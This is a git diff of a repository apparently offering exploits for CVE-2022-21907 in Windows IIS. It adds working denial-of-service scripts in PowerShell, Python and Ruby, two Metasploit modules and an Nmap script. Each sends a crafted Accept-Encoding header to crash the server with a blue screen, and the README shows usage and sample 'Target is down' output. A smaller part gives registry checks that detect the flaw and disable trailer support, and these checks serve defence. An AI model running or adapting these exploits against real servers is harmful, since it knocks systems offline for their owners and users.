diff --git a/CVE-2022-21907.ps1 b/CVE-2022-21907.ps1 index 890d002..79119cf 100644 --- a/CVE-2022-21907.ps1 +++ b/CVE-2022-21907.ps1 @@ -1,4 +1,4 @@ -################### +################### # This script exploit the CVE-2022-21907 for a DOS (Denial of Service) attack (Blue Screen). # Copyright (C) 2022 Maurice Lambert @@ -30,7 +30,7 @@ This is free software, and you are welcome to redistribute it under certain conditions. "@ -write $copyright +write "`n$copyright`n" $session = New-Object Microsoft.PowerShell.Commands.WebRequestSession $session.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.62" @@ -55,5 +55,9 @@ $headers = @{ $ErrorActionPreference="Stop" while(1) { - Invoke-WebRequest -UseBasicParsing -Uri "http://$target/" -WebSession $session -Headers $headers + try { + Invoke-WebRequest -UseBasicParsing -Uri "http://$target/" -WebSession $session -Headers $headers -TimeoutSec 10 + } catch { + break + } } \ No newline at end of file diff --git a/CVE-2022-21907.rb b/CVE-2022-21907.rb new file mode 100644 index 0000000..876ef35 --- /dev/null +++ b/CVE-2022-21907.rb @@ -0,0 +1,161 @@ +#!/usr/bin/env ruby +# frozen_string_literal: true + +## +# This script exploit the CVE-2022-21907 for a DOS (Denial of Service) +# attack (Blue Screen). + +################### +# This script exploit the CVE-2022-21907 for a DOS attack. +# Copyright (C) 2022 Maurice Lambert + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. + +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +################### + +## +# Project version +VERSION = '1.0.0' + +## +# Project author +AUTHOR = 'Maurice Lambert' + +## +# E-mail of the author of the project +AUTHOR_EMAIL = 'mauricelambert434@gmail.com' + +## +# Project maintainer +MAINTAINER = 'Maurice Lambert' + +## +# E-mail of the maintainer of the project +MAINTAINER_EMAIL = 'mauricelambert434@gmail.com' + +## +# Project description +DESCRIPTION = ' +This script exploit the CVE-2022-21907 for a DOS (Denial of Service) +attack (Blue Screen). +' + +## +# Project license +LICENSE = 'GPL-3.0 License' + +## +# Project url +URL = 'https://github.com/mauricelambert/CVE-2022-21907' + +## +# Project copyright +COPYRIGHT = ' +CVE-2022-21907 Copyright (C) 2022 Maurice Lambert +This program comes with ABSOLUTELY NO WARRANTY. +This is free software, and you are welcome to redistribute it +under certain conditions. +' + +puts "#{COPYRIGHT}\n" + +require 'net/http' + +## +# This class implements methods to exploit +# the CVE-2022-21907 for a DOS (Denial of Service) +# attack (Blue Screen) with ruby. +class CVE202221907 + ## + # This function gets target host from the STDIN + + def self.get_stdin_host + print 'Host (target): ' + gets.strip + end + + ## + # This function generates a random string + + def self.generate_random_string(size) + upper_characters = Array('A'..'Z') + Array.new(size) { upper_characters.sample }.join + end + + ## + # This function generates a random payload + + def self.generate_encoding_payload + "#{generate_random_string(24)},#{generate_random_string(60)}&" \ + "#{generate_random_string(2)}&**" \ + "#{generate_random_string(20)}**#{Array('A'..'Z').sample}," \ + "#{generate_random_string(73)},#{generate_random_string(71)}" \ + ",#{generate_random_string(27)},****************************" \ + "#{generate_random_string(6)}, *, ," + end + + ## + # This function checks the target state + + def self.check_up(request, uri) + res = Net::HTTP.start( + uri.hostname, uri.port, + read_timeout: 60, + open_timeout: 60, + use_ssl: uri.scheme == 'https' + ) { |http| http.request(request) } + rescue Net::OpenTimeout, Errno::ETIMEDOUT, SocketError + puts '[!] This host is probably inaccessible' + 2 + else + nil + end + + ## + # The main function to launch the attack + + def self.main + host = ARGV[0] || get_stdin_host + + uri = URI("http://#{host}") + request = Net::HTTP::Get.new(uri) + + access_error = check_up(request, uri) + return access_error if access_error + + request['Accept-Encoding'] = generate_encoding_payload + vulnerable = false + + 10.times do + Net::HTTP.start( + uri.hostname, uri.port, + read_timeout: 10, + open_timeout: 10, + use_ssl: uri.scheme == 'https' + ) { |http| http.request(request) } + rescue Net::OpenTimeout, Errno::ETIMEDOUT + vulnerable = true + break + end + + if vulnerable + puts "[+] Target: #{host} is vulnerable and down." + 0 + else + puts "[-] Target: #{host} is not vulnerable and up." + 1 + end + end +end + +exit(CVE202221907.main) if __FILE__ == $PROGRAM_NAME diff --git a/CVE202221907.py b/CVE202221907.py index 3e2ecbb..5d528de 100644 --- a/CVE202221907.py +++ b/CVE202221907.py @@ -51,35 +51,40 @@ print(copyright) +from urllib.error import URLError, HTTPError from urllib.request import Request, urlopen -from sys import exit, stderr +from sys import exit, stderr, argv +from socket import timeout -host = input("Target: ") +host = argv[1] if len(argv) == 2 else input("Target: ") headers = { - "Accept-Encoding": 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,' + "Accept-Encoding": "AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ," } try: - response = urlopen(f"http://{host}") -except (URLError, HTTPError) as e: + urlopen(f"http://{host}") +except HTTPError: pass except Exception as e: - print(f"http://{host} is not DOWN.") - print(f"{e.__class__}: {e}", file = stderr) + print(f"[!] http://{host} is not UP (get no response).") + print(f"{e.__class__.__name__}: {e}", file=stderr) exit(1) -print(f"http://{host} is not UP. Start hacking...") +print(f"[+] http://{host} is UP. Send payload...") while True: try: - response = urlopen(Request(f"http://{host}", headers=headers)) - except TimeoutError as e: - print(f"http://{host} is not DOWN. {host} is vulnerable to CVE-2022-21907.") - exit(0) - except (URLError, HTTPError) as e: - pass + urlopen(Request(f"http://{host}", headers=headers)) + except (timeout, TimeoutError, URLError): + print( + f"[+] http://{host} is DOWN. {host} is vulnerable to CVE-2022-21907." + ) + exit(0) + except HTTPError: + pass except Exception as e: - print(f"{e.__class__}: {e}") + print(f"{e.__class__.__name__}: {e}", file=stderr) - print(f"Payload sent successfully. Try new request...") + print("[!] Host is up.", file=stderr) + print("[+] Payload sent successfully. Try new request...") diff --git a/README.md b/README.md index 4cb05f0..69868d0 100644 --- a/README.md +++ b/README.md @@ -3,11 +3,31 @@ ## Description 1. This repository detects a system vulnerable to `CVE-2022-21907` (**CVSS:3.1 9.8**) and protects against this vulnerability if desired. I offer 2 powershell codes in 1 line. - 2. I propose a python script and powershell script to attack a vulnerable IIS Web Server (perform a DOS attack to crash (blue screen) the server). + 2. I propose pure python, powershell, ruby scripts and metasploit, nmap modules to attack a vulnerable IIS Web Server (perform a DOS attack to crash (blue screen) the server). ## Detection and protection -### Detect only +### Script + +This script launch 2 online code for detection and 2 online for protection. + +```text +cmd> powershell ./detection_protection_cve2022_21907.ps1 + +CVE-2022-21907 Copyright (C) 2022 Maurice Lambert +This program comes with ABSOLUTELY NO WARRANTY. +This is free software, and you are welcome to redistribute it +under certain conditions. + +Not vulnerable to CVE-2022-2190 +Not vulnerable to CVE-2022-2190 +Not vulnerable to CVE-2022-2190 +Not vulnerable to CVE-2022-2190 + +cmd> +``` + +### Detect only (oneline) ```powershell $ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and $(Write-Host "$env:computername vulnerable to CVE-2022-2190 !") @@ -17,7 +37,7 @@ $ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\Sys $ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 !"}else{echo "Not vulnerable to CVE-2022-2190"} ``` -### Detect and protect +### Detect and protect (oneline) Run this powershell line **as administrator** to protect your computer/server. @@ -29,7 +49,9 @@ $ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\Sys $ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0";Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport -Value 0}else{echo "Not vulnerable to CVE-2022-2190"} ``` -## Hack: DOS - BlueScreen +## Exploit: DOS - BlueScreen + +Demontration (using powershell) on youtube: [![DOS attack with powershell](https://img.youtube.com/vi/kaZrfpsh3ds/0.jpg "DOS attack with powershell")](https://www.youtube.com/watch?v=kaZrfpsh3ds) @@ -38,18 +60,147 @@ $ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\Syst ```bash python3 CVE202221907.py # OR +chmod u+x CVE202221907.py ./CVE202221907.py + +python3 CVE202221907.py +# OR +chmod u+x CVE202221907.py +./CVE202221907.py + +python3 CVE202221907.py 10.10.10.10 +# OR +chmod u+x CVE202221907.py +./CVE202221907.py 10.10.10.10:8000 +# OR +python3 CVE202221907.py mywebservername +``` + +```text +~# python CVE202221907.py + +CVE-2022-21907 Copyright (C) 2022 Maurice Lambert +This program comes with ABSOLUTELY NO WARRANTY. +This is free software, and you are welcome to redistribute it +under certain conditions. + +Target: 10.10.10.10 + +[+] http://10.10.10.10 is UP. Send payload... +[+] http://10.10.10.10 is DOWN. 10.10.10.10 is vulnerable to CVE-2022-21907. + +~# ``` ### Powershell ```powershell -powershell "CVE-2022-21907.ps1" +powershell ./CVE-2022-21907.ps1 +powershell ./CVE-2022-21907.ps1 mywebservername +powershell ./CVE-2022-21907.ps1 -Target 10.10.10.10 +``` + +```text +cmd> powershell ./CVE-2022-21907.ps1 + +cmdlet CVE-2022-21907.ps1 at command pipeline position 1 +Supply values for the following parameters: +target: 10.10.10.10:8000 + +CVE-2022-21907 Copyright (C) 2022 Maurice Lambert +This program comes with ABSOLUTELY NO WARRANTY. +This is free software, and you are welcome to redistribute it +under certain conditions. + +cmd> +``` + +### Ruby + +```bash +ruby CVE-2022-21907.rb +ruby CVE-2022-21907.rb 10.10.10.10 +``` + +```text +~# ruby CVE-2022-21907.rb + +CVE-2022-21907 Copyright (C) 2022 Maurice Lambert +This program comes with ABSOLUTELY NO WARRANTY. +This is free software, and you are welcome to redistribute it +under certain conditions. + +Host (target): 10.10.10.10 +[+] Target: 10.10.10.10 is vulnerable and down. + +~# +``` + +### Metasploit + +#### Python module + +```text +msf6 > use exploit/windows/iis/py_dos_iis_2022_21907 +msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > set RHOST 10.10.10.10 +RHOST => 10.10.10.10 +msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > set RPORT 80 +RPORT => 80 +msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > exploit +[*] Running module against 127.0.0.1 + +[*] Starting server... +[*] py_dos_iis_2022_21907.py[10.10.10.10:80] - Trying first connection... +[*] py_dos_iis_2022_21907.py[10.10.10.10:80] - First connection OK. Sending payload... +[*] py_dos_iis_2022_21907.py[10.10.10.10:80] - Target is down ! Congratulations ! +[*] Auxiliary module execution completed +msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > +``` + +#### Ruby module + +```text +msf6 > use exploit/windows/iis/rb_dos_iis_2022_21907 +msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set RHOST 10.10.10.10 +RHOST => 10.10.10.10 +msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > exploit +[*] Running module against 10.10.10.10 + +[+] Target is down ! Congratulations ! +[*] Auxiliary module execution completed +msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > +``` + +### Nmap + +```bash +nmap -p 80 --script dos_iis_2022_21907 10.10.10.10 +``` + +```text +~# nmap -p 80 --script dos_iis_2022_21907 10.10.10.10 +80/tcp open http +| dos_iis_2022_21907: +| VULNERABLE: +| IIS CVE-2022-21907 DOS +| State: VULNERABLE (Exploitable) +| IDs: CVE:CVE-2022-21907 +| The IIS Web Server contains a RCE vulnerability. This script +| exploits this vulnerability with a DOS attack +| (causes a Blue Screen). +| +| Disclosure date: 2022-01-11 +| References: +| https://nvd.nist.gov/vuln/detail/CVE-2022-21907 +| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907 +|_ https://github.com/mauricelambert/CVE-2022-21907 ``` ## Sources - [Microsoft](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907) + - [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2022-21907) + - [Pure ruby script documentation](https://mauricelambert.github.io/info/ruby/code/CVE202221907.html) ## Licence diff --git a/detection_protection_cve2022_21907.ps1 b/detection_protection_cve2022_21907.ps1 new file mode 100644 index 0000000..d69b6bc --- /dev/null +++ b/detection_protection_cve2022_21907.ps1 @@ -0,0 +1,38 @@ +################### +# Detect and protect CVE-2022-21907. +# Copyright (C) 2022 Maurice Lambert + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. + +# You should have received a copy of the GNU General Public License +# along with this program. If not, see . +################### + +$license="GPL-3.0 License" + +Write-Host " +CVE-2022-21907 Copyright (C) 2022 Maurice Lambert +This program comes with ABSOLUTELY NO WARRANTY. +This is free software, and you are welcome to redistribute it +under certain conditions. +" + +# Only detect + +$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and $(Write-Host "$env:computername vulnerable to CVE-2022-2190 !") + +$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 !"}else{echo "Not vulnerable to CVE-2022-2190"} + +# With protection + +$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0";Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport -Value 0}else{echo "Not vulnerable to CVE-2022-2190"} + +$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and ($(Write-Host "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0") -or $(Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport -Value 0)) diff --git a/dos_iis_2022_21907.nse b/dos_iis_2022_21907.nse new file mode 100644 index 0000000..4c8bdde --- /dev/null +++ b/dos_iis_2022_21907.nse @@ -0,0 +1,83 @@ +description = [[ + The IIS Web Server contains a RCE vulnerability. This script + exploits this vulnerability with a DOS attack (causes a Blue Screen). +]] + +author = "Maurice LAMBERT " +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" +categories = {"dos", "exploit", "intrusive", "vuln"} + +--- +-- @name +-- IIS DOS CVE-2022-21907 - Web Server Blue Screen +-- @author +-- Maurice LAMBERT +-- @usage +-- nmap -p 80 --script dos_iis_2022_21907 +-- @output +-- PORT STATE SERVICE +-- 80/tcp open http +-- | dos_iis_2022_21907: +-- | VULNERABLE: +-- | IIS CVE-2022-21907 DOS +-- | State: VULNERABLE (Exploitable) +-- | IDs: CVE:CVE-2022-21907 +-- | The IIS Web Server contains a RCE vulnerability. This script +-- | exploits this vulnerability with a DOS attack +-- | (causes a Blue Screen). +-- | +-- | Disclosure date: 2022-01-11 +-- | References: +-- | https://nvd.nist.gov/vuln/detail/CVE-2022-21907 +-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907 +-- |_ https://github.com/mauricelambert/CVE-2022-21907 + +local shortport = require "shortport" +local stdnse = require "stdnse" +local vulns = require "vulns" +local http = require "http" + +portrule = shortport.http + +action = function(host, port) + local vuln = { + title = "IIS CVE-2022-21907 DOS", + state = vulns.STATE.NOT_VULN, + IDS = { CVE = 'CVE-2022-21907' }, + description = [[ + The IIS Web Server contains a RCE vulnerability. This script + exploits this vulnerability with a DOS attack + (causes a Blue Screen). + ]], + references = { + 'https://nvd.nist.gov/vuln/detail/CVE-2022-21907', + 'https://github.com/mauricelambert/CVE-2022-21907', + }, + dates = { + disclosure = {year = '2022', month = '01', day = '11'}, + }, + } + + local report = vulns.Report:new(SCRIPT_NAME, host, port) + local headers = {} + headers["Accept-Encoding"] = "AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ," + + stdnse.debug2("Web service is up. Send payload...") + local response = http.generic_request( + host, + port, + "GET", + "/", + { + timeout = 10, + header = headers, + } + ) + + if (response.status) then + return report:make_output(vuln) + else + vuln.state = vulns.STATE.EXPLOIT -- UNKNOWN, LIKELY_VULN + return report:make_output(vuln) + end +end \ No newline at end of file diff --git a/py_dos_iis_2022_21907.py b/py_dos_iis_2022_21907.py new file mode 100644 index 0000000..4607e77 --- /dev/null +++ b/py_dos_iis_2022_21907.py @@ -0,0 +1,123 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +""" +This module requires Metasploit: https://metasploit.com/download +Current source: https://github.com/rapid7/metasploit-framework + +This module performs a DOS attack using a simple HTTP request. +""" + +from urllib.error import URLError, HTTPError +from urllib.request import Request, urlopen +from ssl import _create_unverified_context +from logging import info, error +from os.path import basename +from socket import timeout +from typing import Dict + +from metasploit import module + +metadata = { + "name": "CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability - Windows IIS DOS BlueScreen", + "description": "This module can be used to perform a DOS attack on IIS server. This module exploit the CVE-2022-21907 and causes a Blue Screen with only one payload.", + "license": "MSF_LICENSE", + "authors": ["Maurice LAMBERT "], + "date": "2022-01-11", + "references": [ + {"type": "cve", "ref": "2022-21907"}, + { + "type": "url", + "ref": "https://nvd.nist.gov/vuln/detail/CVE-2022-21907", + }, + { + "type": "url", + "ref": "https://github.com/mauricelambert/CVE-2022-21907", + }, + ], + "type": "dos", + "options": { + "rhost": { + "type": "address", + "description": "Target address", + "required": True, + "default": None, + }, + "rport": { + "type": "int", + "description": "Target port", + "required": True, + "default": 80, + }, + "verbose": { + "type": "bool", + "description": "Verbose mode", + "required": False, + "default": None, + }, + "ssl": { + "type": "bool", + "description": "Use SSL", + "required": False, + "default": False, + }, + }, +} + + +def run(args: Dict[str, str]) -> None: + + """ + This module performs a DOS attack using a simple HTTP request. + """ + + port = args["rport"] + host = args["rhost"] + ssl = False if not args["ssl"] or args["ssl"] == "false" else True + + payload = { + "Accept-Encoding": "AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ," + } + + module.LogHandler.setup(msg_prefix=f"{basename(__file__)}[{host}:{port}] - ") + + info("Trying first connection...") + + try: + urlopen( + f'http{"s" if ssl else ""}://{host}:{port}', + context=_create_unverified_context() if ssl else None, + ) + except HTTPError: + pass + except Exception as e: + error( + f"The connection was refused by the remote host ({host}:{port})." + ) + error( + f"Auxiliary aborted due to failure: unreachable: {host}:{port} - Could not connect to web service - no response" + ) + return None + + info("First connection OK. Sending payload...") + + try: + urlopen( + Request( + f'http{"s" if ssl else ""}://{host}:{port}', + headers=payload, + ), + context=_create_unverified_context() if ssl else None, + timeout=10, + ) + except (timeout, TimeoutError, URLError): + info("Target is down ! Congratulations !") + return None + except Exception as e: + error(f"{e.__class__.__name__}: {e}") + + error("Target is not vulnerable and up.") + + +if __name__ == "__main__": + module.run(metadata, run) diff --git a/rb_dos_iis_2022_21907.rb b/rb_dos_iis_2022_21907.rb new file mode 100644 index 0000000..ab07af2 --- /dev/null +++ b/rb_dos_iis_2022_21907.rb @@ -0,0 +1,82 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +### +# +# This module performs a DOS attack using a simple HTTP request. +# +### +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Dos + + ## + # Initialize informations about module. + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability - Windows IIS DOS BlueScreen', + 'Description' => 'This module can be used to perform a DOS attack on IIS server. This module exploit the CVE-2022-21907 and causes a Blue Screen with only one payload.', + 'License' => MSF_LICENSE, + 'Author' => ['Maurice LAMBERT '], + 'Platform' => 'win', + 'References' => [ + ['CVE', '2022-21907'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21907'], + ['URL', 'https://github.com/mauricelambert/CVE-2022-21907'] + ], + 'DisclosureDate' => '2022-01-11', + 'Notes' => { + 'Stability' => [CRASH_OS_RESTARTS], + 'Reliability' => [IOC_IN_LOGS], + 'SideEffects' => [] + } + ) + ) + end + + ## + # This module performs a DOS attack using a simple HTTP request. + def run + vprint_status('Trying first connection...') + + res = send_request_raw( + 'uri' => "/", + 'method' => 'GET' + ) + + if res.nil? + fail_with( + Failure::Unreachable, + "#{peer} - Could not connect to web service - no response" + ) + end + + vprint_good('First connection OK. Sending payload...') + + payload = { + 'Accept-Encoding' => 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,' + } + timeout = datastore['HttpClientTimeout'] + datastore['HttpClientTimeout'] = 10 + + res = send_request_raw({ + 'uri' => "/", + 'timeout' => 10, + 'method' => 'GET', + 'headers' => payload + }) + + if res.nil? + print_good('Target is down ! Congratulations !') + else + print_error('Target is not vulnerable and up.') + end + + datastore['HttpClientTimeout'] = timeout + end +end \ No newline at end of file